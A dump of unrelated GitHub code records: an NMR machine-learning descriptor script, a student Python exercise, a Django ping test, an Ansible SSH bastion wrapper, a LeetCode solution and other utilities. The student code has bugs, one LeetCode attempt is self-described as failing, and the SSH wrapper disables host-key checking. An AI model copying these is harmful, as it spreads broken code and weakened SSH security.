self.orbital_charge_mulliken_p = orbital_charge_mulliken_p\n self.orbital_charge_loewdin_p = orbital_charge_loewdin_p\n self.mayer_valence_total = mayer_valence_total\n self.shielding_diamagnetic = shielding_diamagnetic\n self.shielding_paramagnetic = shielding_paramagnetic\n self.span = span\n self.skew = skew\n self.asymmetry = asymmetry\n self.anisotropy = anisotropy\n self.shielding_cc_3z = shielding_cc_3z\n self.shielding_dft_3z = shielding_dft_3z\n self.shielding_dft_4z = shielding_dft_4z\n self.shielding_dft_5z = shielding_dft_5z\n if None in [self.shielding_cc_3z, self.shielding_dft_3z, self.shielding_dft_4z, self.shielding_dft_5z]:\n self.shielding_cc_ext = None\n else:\n self.shielding_cc_ext = extrapolate(self.shielding_cc_3z, self.shielding_dft_3z, self.shielding_dft_4z, self.shielding_dft_5z)\n\n def set_acsf(self, acsf_data):\n self.include_acsf = True\n self.acsf_data = acsf_data\n\n def set_soap(self, soap_data):\n self.include_soap = True\n self.soap_data = soap_data\n\n\nclass DataPointH(DataPoint):\n\n def set_attr_special(\n self, refshielding_low, shift_neighbor,\n cn_d3, number_hch, number_hyx,\n distance_hc, bond_order_loewdin, bond_order_mayer,\n refshielding_cc_ext=None\n ):\n self.element = 'H'\n self.shift_low = refshielding_low - self.shielding_low\n self.shift_neighbor = shift_neighbor\n self.cn_d3 = cn_d3\n self.number_hch = number_hch\n self.number_hyx = number_hyx\n self.distance_hc = distance_hc\n self.bond_order_loewdin = bond_order_loewdin\n self.bond_order_mayer = bond_order_mayer\n if refshielding_cc_ext is None:\n self.shift_cc_ext = self.deviation = None\n else:\n self.shift_cc_ext = refshielding_cc_ext - self.shielding_cc_ext\n self.deviation = self.shift_cc_ext - self.shift_low\n\n\n def get_header(self):\n\n nvar = 25\n if self.print_names: nvar += 3\n if self.include_acsf: nvar += len(descriptors.acsf_labels)\n if self.include_soap: nvar += len(descriptors.soap_labels_reduced)\n\n header_1 = \"# \" + \" \".join([str(i) for i in range(nvar)])\n header_2 = \"# shift_high-low shift_low CN(X) no_HCH no_HYH no_HYC no_HYN no_HYO dist_HC shift_low_neighbor_C shielding_dia shielding_para span skew asymmetry anisotropy at_charge_mull at_charge_loew orb_charge_mull_s orb_charge_mull_p orb_charge_loew_s orb_charge_loew_p BO_loew BO_mayer mayer_VA\"\n if self.print_names: header_2 = \"# compound structure atom\" + header_2[1:]\n if self.include_acsf: header_2 += \" \" + \" \".join(descriptors.acsf_labels)\n if self.include_soap: header_2 += \" \" + \" \".join(descriptors.soap_labels_reduced)\n\n return [header_1, header_2]\n\n\n def get_printout(self):\n\n if self.print_names:\n beginning = [self.name[:3], self.name[4:], self.atom]\n else:\n beginning = []\n\n line = (\n beginning\n + [self.deviation, self.shift_low, self.cn_d3, self.number_hch]\n + self.number_hyx\n + [\n self.distance_hc, self.shift_neighbor,\n self.shielding_diamagnetic, self.shielding_paramagnetic,\n self.span, self.skew, self.asymmetry, self.anisotropy,\n self.atomic_charge_mulliken, self.atomic_charge_loewdin,\n self.orbital_charge_mulliken_s, self.orbital_charge_mulliken_p,\n self.orbital_charge_loewdin_s, self.orbital_charge_loewdin_p,\n self.bond_order_loewdin, self.bond_order_mayer, self.mayer_valence_total\n ]\n )\n\n if self.include_acsf: line += [self.acsf_data[acsf_name] for acsf_name in descriptors.acsf_labels]\n if self.include_soap: line += [self.soap_data[soap_name] for soap_name in descriptors.soap_labels_reduced]\n\n return \" \".join([str(val) for val in line])\n\n\nclass DataPointC(DataPoint):\n\n def set_attr_special(\n self, refshielding_low, cn_d3, number_cx, number_cyx,\n orbital_charge_mulliken_d, orbital_charge_loewdin_d, orbital_stdev_mulliken_p, orbital_stdev_loewdin_p,\n bond_orders_loewdin_sum, bond_orders_mayer_sum, bond_orders_loewdin_av, bond_orders_mayer_av,\n refshielding_cc_ext=None\n ):\n self.element = 'C'\n self.shift_low = refshielding_low - self.shielding_low\n self.cn_d3 = cn_d3\n self.number_cx = number_cx\n self.number_cyx = number_cyx\n self.orbital_charge_mulliken_d = orbital_charge_mulliken_d\n self.orbital_charge_loewdin_d = orbital_charge_loewdin_d\n self.orbital_stdev_mulliken_p = orbital_stdev_mulliken_p\n self.orbital_stdev_loewdin_p = orbital_stdev_loewdin_p\n self.bond_orders_loewdin_sum = bond_orders_loewdin_sum\n self.bond_orders_mayer_sum = bond_orders_mayer_sum\n self.bond_orders_loewdin_av = bond_orders_loewdin_av\n self.bond_orders_mayer_av = bond_orders_mayer_av\n if refshielding_cc_ext is None:\n self.shift_cc_ext = self.deviation = None\n else:\n self.shift_cc_ext = refshielding_cc_ext - self.shielding_cc_ext\n self.deviation = self.shift_cc_ext - self.shift_low\n\n\n def get_header(self):\n\n nvar = 32\n if self.print_names: nvar += 3\n if self.include_acsf: nvar += len(descriptors.acsf_labels)\n if self.include_soap: nvar += len(descriptors.soap_labels_reduced)\n\n header_1 = \"# \" + \" \".join([str(i) for i in range(nvar)])\n header_2 = \"# shift_high-low shift_low CN(X) no_CH no_CC no_CN no_CO no_CYH no_CYC no_CYN no_CYO shielding_dia shielding_para span skew asymmetry anisotropy at_charge_mull at_charge_loew orb_charge_mull_s orb_charge_mull_p orb_charge_mull_d orb_stdev_mull_p orb_charge_loew_s orb_charge_loew_p orb_charge_loew_d orb_stdev_loew_p BO_loew_sum BO_loew_av BO_mayer_sum BO_mayer_av mayer_VA\"\n if self.print_names: header_2 = \"# compound structure atom\" + header_2[1:]\n if self.include_acsf: header_2 += \" \" + \" \".join(descriptors.acsf_labels)\n if self.include_soap: header_2 += \" \" + \" \".join(descriptors.soap_labels_reduced)\n\n return [header_1, header_2]\n\n\n def get_printout(self):\n\n if self.print_names:\n beginning = [self.name[:3], self.name[4:], self.atom]\n else:\n beginning = []\n\n line = (\n beginning\n + [self.deviation, self.shift_low, self.cn_d3]\n + self.number_cx + self.number_cyx\n + [\n self.shielding_diamagnetic, self.shielding_paramagnetic,\n self.span, self.skew, self.asymmetry, self.anisotropy,\n self.atomic_charge_mulliken, self.atomic_charge_loewdin,\n self.orbital_charge_mulliken_s, self.orbital_charge_mulliken_p, self.orbital_charge_mulliken_d, self.orbital_stdev_mulliken_p,\n self.orbital_charge_loewdin_s, self.orbital_charge_loewdin_p, self.orbital_charge_loewdin_d, self.orbital_stdev_loewdin_p,\n self.bond_orders_loewdin_sum, self.bond_orders_loewdin_av, self.bond_orders_mayer_sum, self.bond_orders_mayer_av,\n self.mayer_valence_total,\n ]\n )\n\n if self.include_acsf: line += [self.acsf_data[acsf_name] for acsf_name in descriptors.acsf_labels]\n if self.include_soap: line += [self.soap_data[soap_name] for soap_name in descriptors.soap_labels_reduced]\n\n return \" \".join([str(val) for val in line])\n\n\nif __name__ == \"__main__\":\n\n workdir = os.getcwd()\n\n # initialize some proper parser for the command line input\n parser = argparse.ArgumentParser()\n parser.add_argument('-e', '--set', type=str, help='choose to extract data from the test set compounds; provide the path to the data set directory')\n parser.add_argument('-a', '--sample', nargs=3, help='choose to extract data from a sample compound; provide structure in .xyz format, an orca output file, and a data directory (path to the data of the desired reference compound)', metavar=('xyz', 'out', 'data'))\n parser.add_argument('-ar', '--sample_ref', nargs=3, help='choose to extract data from a sample compound with high-level reference shifts; provide structure in .xyz format, an orca output file, and a data directory (path to the data of the desired reference compound and the high-level reference data)', metavar=('xyz', 'out', 'data'))\n parser.add_argument('-fl', '--functional_low', default='pbe0', help='functional for low-level DFT NMR shift to be corrected, default: pbe0')\n parser.add_argument('-bl', '--basis_low', default='pcSseg-2', help='basis set for low-level DFT NMR shift to be corrected, default: pcSseg-2')\n parser.add_argument('-r', '--reference', default='tms', help='reference compound for NMR shift, default: tms')\n parser.add_argument('-s', '--shuffle', default='structures', choices=['none', 'atoms', 'structures', 'compounds'], help='shuffle mode for the data set: atoms, structures or compounds, default: structures')\n parser.add_argument('-rs', '--randomseed', type=int, default=0, help='random seed for data shuffling, default: 0')\n parser.add_argument('-pn', '--print_names', action='store_true', help='additionally print names (i.e. compound, structures, and atom numbers) in the data set file (only relevant for --set option)')\n parser.add_argument('-i', '--include', nargs='+', type=str.lower, choices=['acsf', 'soap'], help='optionally include ACSF and/or SOAP features')\n\n args = parser.parse_args()\n\n if args.set is not None:\n input_mode = 'set'\n datapath = args.set\n elif args.sample is not None:\n input_mode = 'sample'\n samplepath_xyz, samplepath_out, datapath = args.sample\n elif args.sample_ref is not None:\n input_mode = 'sample_ref'\n samplepath_xyz, samplepath_out, datapath = args.sample_ref\n else:\n print(\"ERROR: no input mode selected! Please select --set, --sample <str> or --sample_ref <str>\")\n exit()\n\n reference = args.reference\n # The settings for the reference and extrapolation methods are currently fixed\n functional_high = 'bhlyp'\n basis_3z = 'pcSseg-2'\n basis_4z = 'pcSseg-3'\n basis_5z = 'pcSseg-4'\n\n functional_low = args.functional_low\n basis_low = args.basis_low\n shuffle_mode = args.shuffle\n random_seed = args.randomseed\n print_names = args.print_names\n\n if args.include is None: include = []\n else: include = include = args.include\n\n # import the ACSF and SOAP routines within dscribe only when they are needed\n if any(i in include for i in ['acsf', 'soap']): import additional_descriptors as descriptors\n\n if input_mode == 'set':\n\n compounds = [c + 1 for c in range(100)] # compound numbers from 1 to 100\n structures = {}\n for comp in compounds: structures[comp] = [int(f) for f in sorted(os.listdir(os.path.join(datapath, str(comp).zfill(3))))]\n\n print(\"Extracting ML descriptors from the data set\\n\")\n print(\"Settings:\")\n print(\"Reference coupled-cluser calculation level: CCSD(T)/{}\".format(basis_3z))\n print(\"Functional for DFT CBS extrapolation : {}\".format(functional_high))\n print(\"Basis sets for DFT CBS extrapolation : {}, {}, {}\".format(basis_3z, basis_4z, basis_5z))\n print(\"Functional for low-level DFT calculation : {}\".format(functional_low))\n print(\"Basis set for low-level DFT calculation : {}\".format(basis_low))\n print(\"Reference compound : {}\".format(reference))\n print(\"Shuffle mode : {}\".format(shuffle_mode))\n print(\"Random seed for shuffling : {}\\n\".format(random_seed))\n\n high_level = {\n 'functional': functional_high,\n 'basis_3z': basis_3z,\n 'basis_4z': basis_4z,\n 'basis_5z': basis_5z\n }\n\n ref, ref_high = get_reference(datapath, reference, functional_low, basis_low, high_level)\n\n data_h = []\n data_c = []\n for comp in compounds:\n print(\"collecting data from compound {} ({} structures)\".format(comp, len(structures[comp])))\n for struct in structures[comp]:\n name = str(comp).zfill(dc) + '_' + str(struct).zfill(ds)\n structpath = os.path.join(datapath, str(comp).zfill(dc), str(struct).zfill(ds))\n path_xyz = os.path.join(structpath, functional_low, basis_low, name + '.xyz')\n path_out = os.path.join(structpath, functional_low, basis_low, 'orca.out')\n\n dath, datc, _ = get_data(path_xyz, path_out, name, ref, include, high_level, ref_high, structpath, print_names)\n data_h.extend(dath)\n data_c.extend(datc)\n \n n_structures = sum([len(v) for v in structures.values()])\n print(\"\\nAnalyzed a total number of:\")\n print(\"{} compounds\".format(len(compounds)))\n print(\"{} structures\".format(n_structures))\n print(\"{} 1H NMR shifts\".format(len(data_h)))\n print(\"{} 13C NMR shifts\".format(len(data_c)))\n\n # optionally shuffle the data (mode = 'structures' (default), 'compounds', 'atoms', 'none')\n if shuffle_mode == 'none':\n data_h_shuffled = data_h\n data_c_shuffled = data_c\n else:\n data_h_shuffled = shuffle_data(data_h, compounds, structures, mode=shuffle_mode)\n data_c_shuffled = shuffle_data(data_c, compounds, structures, mode=shuffle_mode)\n\n # add some method data to the end of the data set file\n extension_settings = [\n \"# high-level CC level : CCSD(T)/{}\".format(basis_3z),\n \"# functional for DFT CBS extrapolation: {}\".format(functional_high),\n \"# basis sets for DFT CBS extrapolation: {}, {}, {}\".format(basis_3z, basis_4z, basis_5z),\n \"# low-level functional (DFT) : {}\".format(functional_low),\n \"# low-level basis set (DFT) : {}\".format(basis_low),\n \"# NMR reference compound : {}\".format(reference),\n \"# shuffle mode : {}\".format(shuffle_mode),\n \"# random seed for shuffling : {}\\n\".format(random_seed)\n ]\n\n write_ml_input(data_h_shuffled, workdir, \"ml_\" + functional_low + \"_\" + basis_low + \"_h.dat\", extension=\"\\n\".join(extension_settings))\n write_ml_input(data_c_shuffled, workdir, \"ml_\" + functional_low + \"_\" + basis_low + \"_c.dat\", extension=\"\\n\".join(extension_settings))\n\n elif input_mode in ['sample', 'sample_ref']:\n\n # define a compound name (use .xyz file and delete .xyz if present)\n sample_name = os.path.abspath(samplepath_xyz).split(os.sep)[-1].replace('.xyz', '')\n\n print(\"Extracting ML descriptors from sample compound: {}\".format(sample_name))\n print(\"... using 3D structure provided in: {}\".format(os.path.abspath(samplepath_xyz)))\n print(\"... using ORCA calculation output in: {}\".format(os.path.abspath(samplepath_out)))\n print(\"... using supplementary data in: {}\\n\".format(os.path.abspath(datapath)))\n print(\"Settings:\")\n if input_mode == 'sample_ref':\n print(\"Reference coupled-cluser calculation level: CCSD(T)/{}\".format(basis_3z))\n print(\"Functional for DFT CBS extrapolation : {}\".format(functional_high))\n print(\"Basis sets for DFT CBS extrapolation : {}, {}, {}\".format(basis_3z, basis_4z, basis_5z))\n print(\"Functional for low-level DFT calculation : {}\".format(functional_low))\n print(\"Basis set for low-level DFT calculation : {}\".format(basis_low))\n print(\"Reference compound : {}\\n\".format(reference))\n elif input_mode == 'sample':\n print(\"Functional for low-level DFT calculation: {}\".format(functional_low))\n print(\"Basis set for low-level DFT calculation : {}\".format(basis_low))\n print(\"Reference compound : {}\\n\".format(reference))\n\n # get all the data\n if input_mode == 'sample_ref':\n high_level = {\n 'functional': functional_high,\n 'basis_3z': basis_3z,\n 'basis_4z': basis_4z,\n 'basis_5z': basis_5z\n }\n ref, ref_high = get_reference(datapath, reference, functional_low, basis_low, high_level)\n data_h, data_c, extension = get_data(samplepath_xyz, samplepath_out, sample_name, ref, include, high_level, ref_high, datapath)\n elif input_mode == 'sample':\n ref, ref_high = get_reference(datapath, reference, functional_low, basis_low)\n data_h, data_c, extension = get_data(samplepath_xyz, samplepath_out, sample_name, ref, include)\n\n print(\"\\nAnalyzed a total number of:\")\n print(\"{} 1H NMR shifts\".format(len(data_h)))\n print(\"{} 13C NMR shifts\".format(len(data_c)))\n\n # add some method data to the beginning of the extension\n extension_settings = [\n \"# low-level functional (DFT): {}\".format(functional_low),\n \"# low-level basis set (DFT): {}\".format(basis_low),\n \"# NMR reference compound: {}\".format(reference),\n ]\n if input_mode == 'sample_ref':\n extension_refsettings = [\n \"# high-level CC level: CCSD(T)/{}\".format(basis_3z),\n \"# functional for DFT CBS extrapolation: {}\".format(functional_high),\n \"# basis sets for DFT CBS extrapolation: {}, {}, {}\".format(basis_3z, basis_4z, basis_5z)\n ]\n extension_settings = extension_refsettings + extension_settings\n extension = \"\\n\".join(extension_settings) + \"\\n\" + extension + \"\\n\"\n\n if input_mode == 'sample_ref':\n write_ml_input(data_h, workdir, \"ml_\" + sample_name + \"_ref_h.dat\", extension=extension, is_sample=True)\n write_ml_input(data_c, workdir, \"ml_\" + sample_name + \"_ref_c.dat\", extension=extension, is_sample=True)\n else:\n write_ml_input(data_h, workdir, \"ml_\" + sample_name + \"_h.dat\", extension=extension, is_sample=True)\n write_ml_input(data_c, workdir, \"ml_\" + sample_name + \"_c.dat\", extension=extension, is_sample=True)\n\n","repo_name":"grimme-lab/ml4nmr","sub_path":"src/getdata.py","file_name":"getdata.py","file_ext":"py","file_size_in_byte":55563,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"3"} +{"seq_id":"21234578285","text":"import math\n\ndef circArea(rad):\n area= math.pi * rad ** 2\n return area\n\ndef rectArea(length, width):\n area= length * width\n# **length and width are the parameters\n return area\n\ndef calcAverage(nums):\n # nums are the parameter\n total = 0\n for num in nums:\n total += num\n avg= total/ len(nums)\n return avg\n\n#VOID FUNCTION\ndef writeAverage(nums, filename):\n total = 0\n for num in nums:\n total += num\n avg= total/ len(nums)\n outfile = open(file, \"w\")\n print(avg, file= outfile)\n outfile.close()\n print(\"Data written to: \" + filename)\n\ndef changeList(values,value):\n # parameters= values and value\n values.append(value)\n \n\ndef main():\n print(\"Area if rad = 10 \" + str(circArea(10)))\n\n area= circArea(3)\n print(\"Area of rad= 3 \" + str(area))\n \n rArea = rectArea(3,5)\n print(\"Area of l= 3, w= 5: \" + str(area))\n\n rArea = rectArea(4,6)\n# ** argument 4,6 \n print(\"Area of l= 4, w= 6: \" + str(area))\n\n average= calcAverage([70, 80, 90, 100, 100])\n print(\"Avg [70, 80, 90, 100, 100]: \"+ str(average))\n\n writeAverage([3,5,7], \"avg.txt\")\n\n names= [\"Alex\", \"Jayse\", \"Megan\"]\n print(names)\n changeList(names, \"Matt\")\n # arguments are names an matt\n print(names)\n \nmain()\n","repo_name":"shefaliemmanuel/CSCI220PythonProgramming","sub_path":"Class Work 7.py","file_name":"Class Work 7.py","file_ext":"py","file_size_in_byte":1315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"29031946697","text":"\"\"\"\nADMIN-4537\n\"\"\"\nfrom inspect import getmembers, isclass\nfrom unittest import skipIf\n\nfrom django.conf import settings\n\nfrom wiki.ping.management.commands.ping import (\n CriticalDatabaseError,\n DatabaseError,\n PingException,\n WrongStatus,\n check_databases,\n)\nfrom wiki.ping.management.commands.ping import validate as ping_validate\nfrom intranet.wiki.tests.wiki_tests.common.wiki_client import WikiClient\nfrom intranet.wiki.tests.wiki_tests.common.wiki_django_testcase import WikiDjangoTestCase\n\n\nclass FakeResponse(object):\n status_code = 500\n text = ''\n\n\nclass PingTest(WikiDjangoTestCase):\n \"\"\"\n Тест ручки /ping\n \"\"\"\n\n client_class = WikiClient\n\n @skipIf(settings.IS_BUSINESS, 'wait for fixing for business')\n def test_get(self):\n response = self.client.get('/ping')\n\n self.assertEqual(200, response.status_code)\n\n def test_command_ping(self):\n fake_resp = FakeResponse()\n\n # incorrect http status\n self.assertRaises(WrongStatus, ping_validate, fake_resp)\n\n fake_resp.status_code = 200\n self.assertEqual(None, ping_validate(fake_resp))\n\n def test_exception_inheritance(self):\n \"\"\"\n All ping module exceptions are subclasses of PingException\n \"\"\"\n from wiki.ping.management.commands import ping, ping_celery\n\n filt = lambda value: isclass(value) and value is not PingException and issubclass(value, Exception)\n\n exceptions = getmembers(ping, filt)\n exceptions.extend(getmembers(ping_celery, filt))\n\n # all ping module exceptions are subclasses of PingException\n for _, exc_class in exceptions:\n self.assertTrue(issubclass(exc_class, PingException))\n\n def test_check_databases(self):\n ALIASES = ['default', 'slave']\n from wiki.ping.management.commands import ping\n\n _db_is_alive = ping.db_is_alive\n\n def db_is_alive(db_name, cache_seconds=0, number_of_tries=1, force=False):\n return db_name in ALIASES\n\n try:\n ping.db_is_alive = db_is_alive\n\n self.assertEqual(None, check_databases(ALIASES))\n\n self.assertRaises(CriticalDatabaseError, lambda: check_databases(['slow', 'slow2']))\n\n self.assertRaises(DatabaseError, lambda: check_databases(['default', 'slow']))\n finally:\n ping.db_is_alive = _db_is_alive\n","repo_name":"Alexander-Berg/2022-tests-examples","sub_path":"Intranet/wiki_tests/unit_unittest/ping/test_ping.py","file_name":"test_ping.py","file_ext":"py","file_size_in_byte":2395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"70490502801","text":"#!/usr/bin/env python3\n\nimport getpass\nimport os\nimport sys\n\nfrom lib import find_executable, get_hostvars, get_var_within, manage_conf_file\n\n\ndef main():\n argv = list(sys.argv[1:]) # Copy\n\n bastion_user = None\n bastion_host = None\n bastion_port = None\n remote_user = None\n remote_port = 22\n default_configuration_file = \"/etc/ovh/bastion/config.yml\"\n\n cmd = argv.pop()\n host = argv.pop()\n\n # check if bastion_vars are passed as env vars in the playbook\n # may be usefull if the ansible controller manage many bastions\n # example :\n # - hosts: all\n # gather_facts: false\n # environment:\n # BASTION_USER: \"{{ bastion_user }}\"\n # BASTION_HOST: \"{{ bastion_host }}\"\n # BASTION_PORT: \"{{ bastion_port }}\"\n #\n # will result as : ... '/bin/sh -c '\"'\"'BASTION_USER=my_bastion_user BASTION_HOST=my_bastion_host BASTION_PORT=22 /usr/bin/python3 && sleep 0'\"'\"''\n for i in list(cmd.split(\" \")):\n if \"bastion_user\" in i.lower():\n bastion_user = i.split(\"=\")[1]\n elif \"bastion_host\" in i.lower():\n bastion_host = i.split(\"=\")[1]\n elif \"bastion_port\" in i.lower():\n bastion_port = i.split(\"=\")[1]\n\n # in some cases (AWX in a non containerised environment for instance), the environment is overridden by the job\n # so we are not able to get the BASTION vars\n # if some vars are still undefined, try to load them from a configuration file\n bastion_host, bastion_port, bastion_user = manage_conf_file(\n os.environ.get(\"BASTION_CONF_FILE\", default_configuration_file),\n bastion_host,\n bastion_port,\n bastion_user,\n )\n\n # lookup on the inventory may take some time, depending on the source, so use it only if not defined elsewhere\n # it seems like some module like template does not send env vars too...\n if not bastion_host or not bastion_port or not bastion_user:\n hostvar = get_hostvars(host) # dict\n\n bastion_port = get_var_within(\n hostvar.get(\"bastion_port\", os.environ.get(\"BASTION_PORT\", 22)), hostvar\n )\n bastion_user = get_var_within(\n hostvar.get(\n \"bastion_user\", os.environ.get(\"BASTION_USER\", getpass.getuser())\n ),\n hostvar,\n )\n bastion_host = get_var_within(\n hostvar.get(\"bastion_host\", os.environ.get(\"BASTION_HOST\")), hostvar\n )\n\n for i, e in enumerate(argv):\n\n if e.startswith(\"User=\"):\n remote_user = e.split(\"=\")[-1]\n argv[i] = \"User={}\".format(bastion_user)\n elif e.startswith(\"Port=\"):\n remote_port = e.split(\"=\")[-1]\n argv[i] = \"Port={}\".format(bastion_port)\n\n # syscall exec\n args = (\n [\n \"ssh\",\n \"-p\",\n bastion_port,\n \"-q\",\n \"-o\",\n \"StrictHostKeyChecking=no\",\n \"-l\",\n bastion_user,\n bastion_host,\n \"-T\",\n ]\n + argv\n + [\n \"--\",\n \"-q\",\n \"-T\",\n \"--never-escape\",\n \"--user\",\n remote_user,\n \"--port\",\n remote_port,\n host,\n \"--\",\n cmd,\n ]\n )\n os.execv(\n find_executable(\"ssh\"), # full path mandatory\n [str(e).strip() for e in args], # execv() arg 2 must contain only strings\n )\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"ovh/the-bastion-ansible-wrapper","sub_path":"sshwrapper.py","file_name":"sshwrapper.py","file_ext":"py","file_size_in_byte":3485,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"3"} +{"seq_id":"25507516853","text":"'''\nGiven two strings s and t, return true if s is a subsequence of t, or false otherwise.\nA subsequence of a string is a new string that is formed from the original string by deleting some (can be none) of the characters without disturbing the relative positions of the remaining characters. (i.e., \"ace\" is a subsequence of \"abcde\" while \"aec\" is not).\n'''\nclass Solution:\n def isSubsequence(self, s: str, t: str) -> bool:\n\n # My solution\n # would be to use a method that could look at the string s \n # and then remove any character not in string s from string t \n # if the new string t has the characters in string s then return true\n\n\n newstring =''\n\n for i in range(len(t)):\n if (t[i] in s):\n newstring += t[i]\n if s == newstring or s in newstring:\n return True\n else: \n return False\n # Works for 17/18 test cases but not the last one\n\n\n\n # Working solution \n # We need to create 2 pointers to iterate through both strings\n # first in the while loop, we go through all letters in string t (hence the j+=1)\n # If the current character on string S is EQUAL to the character on string T\n # THEN we will move onto the next character in S \n\n\nclass Solution:\n def isSubsequence(self, s: str, t: str) -> bool:\n # initialize the pointers \n i =0 \n j =0 \n\n # going through the string with a while loop we want to go through all the characters of s and t \n while i < len(s) and j <len(t):\n # if the current character in s EQUALS to the current character in t, then add one to the i pointer\n if s[i] == t[j]:\n i += 1\n # If it does equal or not,regradless we move onto the next character in t \n j += 1\n\n # if i == len(s):\n # return True \n # else:\n # return False\n\n # if i counter is == to the length of the s string then return true\n return i==len(s)\n\n\n","repo_name":"Jonathan2025/Interview-Questions","sub_path":"questions/Leetcode-Questions/Level 1/Strings/is_subsequence.py","file_name":"is_subsequence.py","file_ext":"py","file_size_in_byte":2042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"8750890843","text":"# Create your views here.\nfrom django.db.models import Q\nfrom rest_framework.mixins import CreateModelMixin, ListModelMixin\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.viewsets import GenericViewSet\n\nfrom app.chat.models import Message\nfrom app.chat.serializers import CreateMessageSerializer, ListMessageSerializer\n\n\nclass MessageViewSet(CreateModelMixin, ListModelMixin, GenericViewSet):\n\n permission_classes = [\n IsAuthenticated,\n ]\n\n serializer_class = ListMessageSerializer\n\n def get_serializer_class(self):\n cls = super().get_serializer_class()\n\n if self.action in (\"create\",):\n cls = CreateMessageSerializer\n elif self.action == \"list\":\n cls = ListMessageSerializer\n\n return cls\n\n def get_queryset(self):\n user = self.request.user\n\n return Message.objects.related_to_user(user)\n\n","repo_name":"akoikelov/binovate-test","sub_path":"app/chat/views/messages.py","file_name":"messages.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"39829560886","text":"# given an arr, return an array such that answer i is the number of days to get a higher num\n# no sorting \n# have a stack that only for decreasing number \n# for each num in temps: while stack.peek is < than current num: pop and update the count\n# add the tuple num and index into the stack/deque\nclass Solution(object):\n def dailyTemperatures(self, temperatures):\n \"\"\"\n :type temperatures: List[int]\n :rtype: List[int]\n \"\"\"\n stack = deque()\n result = [0]*len(temperatures)\n for index, num in enumerate(temperatures): \n while stack and stack[-1][0]<num: \n result[stack[-1][1]] = index - stack[-1][1]\n stack.pop()\n stack.append((num, index))\n return result\n","repo_name":"MaTasty/Grind","sub_path":"dailyTemperatures.py","file_name":"dailyTemperatures.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"4236981910","text":"\"\"\"Handler for the 'apply-styles' command\n(Commands are issued on the command line, per the docopt syntax in __main__.py)\n\"\"\"\n\n# Standard library\nimport os\n\n# Local\nfrom cascade import cmd_check\nfrom cascade.word_docx import WordDocx\nfrom cascade.util import get_directive_type\nfrom cascade.util import add_suffix_to_filename, make_output_file_info\nfrom cascade import quicklog\nfrom cascade.util_eliot import log_function\n\nqlog = quicklog.get_logger()\nlprint = qlog.lprint\n\n@log_function\ndef apply_styles(arguments):\n \"\"\" Apply Cascade styles to all directives\n\n Used to correct documents which were converted to Cascade format \n before Cascade used styles for directives (it previously used \n localized ad-hoc styling applied directly to the paragraphs)\n\n Returns:\n Tuple of output filenames if successful\n None otherwise\n \"\"\"\n\n in_filename = arguments['<requirements.docx>']\n\n if not os.path.isfile(in_filename):\n qlog.error('The file \"{}\" does not exist'.format(in_filename))\n return\n\n # Integrity Check\n if not cmd_check.check(arguments):\n qlog.error('Aborted due to document check failures.')\n return\n\n # Load\n lprint('Loading document...')\n doc = WordDocx(qlog, os.path.abspath(in_filename))\n\n # Identify clusters\n lprint('Identifying paragraph clusters...')\n clusters = doc.get_clusters()\n\n # Parse\n lprint('Parsing clusters...')\n directives_found = 0\n directives_styled = 0\n for cluster in clusters:\n if cluster['cluster_type'] is 'directive':\n directives_found += 1\n directive_dict = cluster['directive']\n directive_type = get_directive_type(directive_dict)\n qlog.debug(\"Processing directive: {}\".format(directive_dict))\n if directive_type == '#shortform':\n target_style = doc._document.styles['Cascade Directive']\n else:\n target_style = doc._document.styles['Cascade Hidden Directive']\n touched = False\n for paragraph in cluster['paragraphs']:\n if paragraph.style != target_style:\n touched = True\n paragraph.style = target_style\n if touched:\n directives_styled += 1\n\n lprint('{} directives were found.'.format(directives_found))\n lprint('{} directives were re-styled.'.format(directives_styled))\n\n #----------------------------\n # Save\n #----------------------------\n out_file_info = make_output_file_info(\n in_filename,\n arguments['<output.docx>'],\n '_STYLED'\n )\n\n lprint('Saving \"{}\"...'.format(out_file_info['path_and_filename']))\n doc.save(out_file_info['path_and_filename'])\n\n return (out_file_info['filename'],)\n","repo_name":"epmoyer/cascade","sub_path":"web/cascade/cmd_apply_styles.py","file_name":"cmd_apply_styles.py","file_ext":"py","file_size_in_byte":2792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"36149743184","text":"# coding=utf-8\n\"\"\"\ncopy from paddlenlp\n\"\"\"\nimport time\nimport logging\nfrom pathlib import Path\nimport math\nimport os\nimport random\n\nimport numpy as np\nfrom tqdm import tqdm\n\n\ndef setLogger(use_ch: bool = False):\n logger = logging.getLogger()\n logger.setLevel(logging.DEBUG) # Log等级总开关\n # 第二步,创建一个handler,用于写入日志文件\n rq = time.strftime('%Y-%m-%d', time.localtime(time.time()))\n log_path = Path.cwd() / 'Logs'\n log_name = log_path / (rq + '.log')\n logfile = log_name\n log_path.mkdir(parents=True, exist_ok=True)\n\n fh = logging.FileHandler(logfile, mode='a', encoding='utf-8')\n fh.setLevel(logging.DEBUG) # 输出到file的log等级的开关\n\n # 第三步,定义handler的输出格式\n formatter = logging.Formatter(\"%(asctime)s - %(filename)s[line:%(lineno)d] - %(levelname)s: %(message)s\")\n fh.setFormatter(formatter)\n\n # 第四步,将filehandler添加到logger里面\n logger.addHandler(fh)\n\n # console handler\n if use_ch:\n ch = logging.StreamHandler()\n ch.setFormatter(formatter)\n logger.addHandler(ch)\n\n return logger\n\n\nlogger = setLogger()\n\n\nclass DataConverter(object):\n \"\"\"DataConverter to convert data export from annotation platform\"\"\"\n\n def __init__(\n self,\n label_studio_file,\n negative_ratio=5,\n prompt_prefix=\"情感倾向\",\n options=[\"正向\", \"负向\"],\n separator=\"##\",\n layout_analysis=False,\n expand_to_a4_size=True,\n schema_lang=\"ch\",\n ocr_lang=\"en\",\n anno_type=\"text\",\n ):\n \"\"\"Init Data Converter\"\"\"\n 